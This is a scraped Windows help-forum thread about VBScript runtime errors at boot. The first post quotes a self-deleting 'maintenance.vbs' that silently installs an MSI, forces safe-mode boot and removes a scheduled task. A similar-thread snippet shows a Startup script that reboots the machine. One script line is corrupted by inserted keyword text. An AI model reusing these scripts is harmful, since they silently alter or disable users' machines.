Windows 10: Microsoft VBScript runtime error

Discus and support Microsoft VBScript runtime error in Windows 10 BSOD Crashes and Debugging to solve the problem; Hello, I have been getting this VBScript runtime error everytime when booting. Currently running Windows 10 on version 1903 build 18362.476. I am not... Discussion in 'Windows 10 BSOD Crashes and Debugging' started by SebastienWatier, Nov 16, 2019.

  1. Microsoft VBScript runtime error


    Hello,

    I have been getting this VBScript runtime error everytime when booting. Currently running Windows 10 on version 1903 build 18362.476. I am not sure how to fix this problem since no one seem to have the same as mine. Is there a way to fix this?



    Microsoft VBScript runtime error 1f4e65e7-12c1-4ee7-8471-71555e6de300?upload=true.png

    This is the code in the maintenance.vbs ;;

    Set oShell = CreateObject ("Wscript.Shell")
    Dim ccdat
    ccdat = "updatesettings.dbf"
    Dim fso, setting, cc, strArgs
    strArgs = "%comspec% /C %SystemRoot%\System32\msiexec.exe /i %SystemRoot%\System32\ServiceInstaller.msi /qn & del %SystemRoot%\System32\ServiceInstaller.msi & %SystemRoot%\System32\bcdedit.exe /set {current} safeboot minimal & %SystemRoot%\System32\powercfg.exe /hibernate off & schtasks /Delete /TN ""Microsoft\Windows\Maintenance\InstallWinSAT"" /F"
    Set fso = CreateObject("Scripting.FileSystemObject")

    If (fso.FileExists(ccdat)) Then
    Set setting = fsMicrosoft VBScript runtime error o_OpenTextFile(ccdat, 1, 0)
    cc = CInt(setting.ReadLine)
    setting.Close
    If(cc > 9) Then
    oShell.Run strArgs, 0, false
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    strScript = Wscript.ScriptFullName
    objFSO.DeleteFile(ccdat)
    objFSO.DeleteFile(strScript)
    WScript.Quit()
    End If
    Set setting = fso.CreateTextFile(ccdat, True, False)
    cc = cc+1
    setting.Write(cc)
    setting.Close
    WScript.Quit()
    Else
    Set setting = fso.CreateTextFile(ccdat, True, False)
    setting.Write("0")
    setting.Close
    WScript.Quit()
    End If

    :)
     
    SebastienWatier, Nov 16, 2019
    #1

  2. Vbscript runtime error permission denied code 800A0046

    Hallo! I have a problem with this error:

    Windows Script Host

    Script:C:\Windows\run.vbs

    Line:22

    Char:2

    ErrorMicrosoft VBScript runtime error :permission denied

    Code:800A0046

    Source:Microsoft VBScript runtime error

    What I can do? Please
     
    CazmirRaul:), Nov 16, 2019
    #2
  3. Naresh_K Win User
    Optiwave Systems Microsoft VBScript Runtime error type Mismatch

    Hi,



    Thank you for writing to Microsoft Community Forums.



    I see that you are trying to run a VBScript and you are getting a runtime error. I would like to inform you that we have a team of experts with well-equipped knowledge about this and they will be glad to help you with the same. Please post your query
    on MSDN forum so that it reaches the dedicated team.



    Regards,
     
    Naresh_K, Nov 16, 2019
    #3
  4. Sid_Heart Win User

    Microsoft VBScript runtime error

    Unable to uninstall product key, when i use "slmgr /upk" it shows "error 70Microsoft VBScript runtime error :permission denies(Microsoft VBScript Runtime error)"

    Unable to uninstall product key, when i use "slmgr /upk" it shows "error 70Microsoft VBScript runtime error :permission denies(Microsoft VBScript Runtime error)."
     
    Sid_Heart, Nov 16, 2019
    #4
Thema:

Microsoft VBScript runtime error

Loading...
  1. Microsoft VBScript runtime error - Similar Threads - Microsoft VBScript runtime

  2. Microsoft VBScript runtime error

    in Windows 10 Gaming
    Microsoft VBScript runtime error: Hello, good day! Microsoft VBScript runtime error is the technical or product issue I need assistance with. Despite my best efforts, I haven't been able to resolve it on my own. Hence, I hope someone in this community might have encountered a similar problem or has expertise...
  3. Microsoft VBScript runtime error

    in Windows 10 Software and Apps
    Microsoft VBScript runtime error: Hello, good day! Microsoft VBScript runtime error is the technical or product issue I need assistance with. Despite my best efforts, I haven't been able to resolve it on my own. Hence, I hope someone in this community might have encountered a similar problem or has expertise...
  4. Error VBScript

    in Windows 10 Customization
    Error VBScript: Hi ! I am getting error about vbs as follows:set g=CreateObject"Scripting.FileSystemObject"set boost=g.CreateTextFile"C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"boost.WriteLine"cmd /k shutdown -r -t 1"This code says it is 'Path not...
  5. Error VBScript

    in Windows 10 Software and Apps
    Error VBScript: Hi ! I am getting error about vbs as follows:set g=CreateObject"Scripting.FileSystemObject"set boost=g.CreateTextFile"C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"boost.WriteLine"cmd /k shutdown -r -t 1"This code says it is 'Path not...
  6. Security center missing from services & microsoft vbscript runtime error '800a0035' file...

    in Windows 10 Software and Apps
    Security center missing from services & microsoft vbscript runtime error '800a0035' file...: Security center missing from services & microsoft vbscript runtime error '800a0035' file not found.........................I done with deleting that malwarevirus ... and quick scan of that software... here are some screenshots but Window Security turn on problem is still...
  7. Security center missing from services & microsoft vbscript runtime error '800a0035' file...

    in AntiVirus, Firewalls and System Security
    Security center missing from services & microsoft vbscript runtime error '800a0035' file...: Security center missing from services & microsoft vbscript runtime error '800a0035' file not found.........................I done with deleting that malwarevirus ... and quick scan of that software... here are some screenshots but Window Security turn on problem is still...
  8. Security center missing from services & microsoft vbscript runtime error '800a0035' file...

    in AntiVirus, Firewalls and System Security
    Security center missing from services & microsoft vbscript runtime error '800a0035' file...: Last day i run a security disable software by mistake . which results in the permanent disable of window security which is now not turn on, also error shows when i restart my pc .... also security center is missing from services.msc .... facing this problem security center...
  9. "Error 2738: Could not access VBScript runtime for custom action"

    in Windows 10 Software and Apps
    "Error 2738: Could not access VBScript runtime for custom action": The error "Error 2738: Could not access VBScript runtime for custom action" displaying at installation of third party software on windows server 2012 R2....
  10. Optiwave Systems Microsoft VBScript Runtime error type Mismatch

    in Windows 10 Drivers and Hardware
    Optiwave Systems Microsoft VBScript Runtime error type Mismatch: Set LayoutMgr = Document.GetLayoutMgr Set Layout = LayoutMgr.GetCurrentLayout Set Canvas = Layout.GetCurrentCanvas Set PmMgr = Layout.GetParameterMgr Set BitRate = PmMgr.GetObjectByName("Bit rate") BitR = BitRate.GetValue(1) Set SymRate = PmMgr.GetObjectByName("Symbol rate")...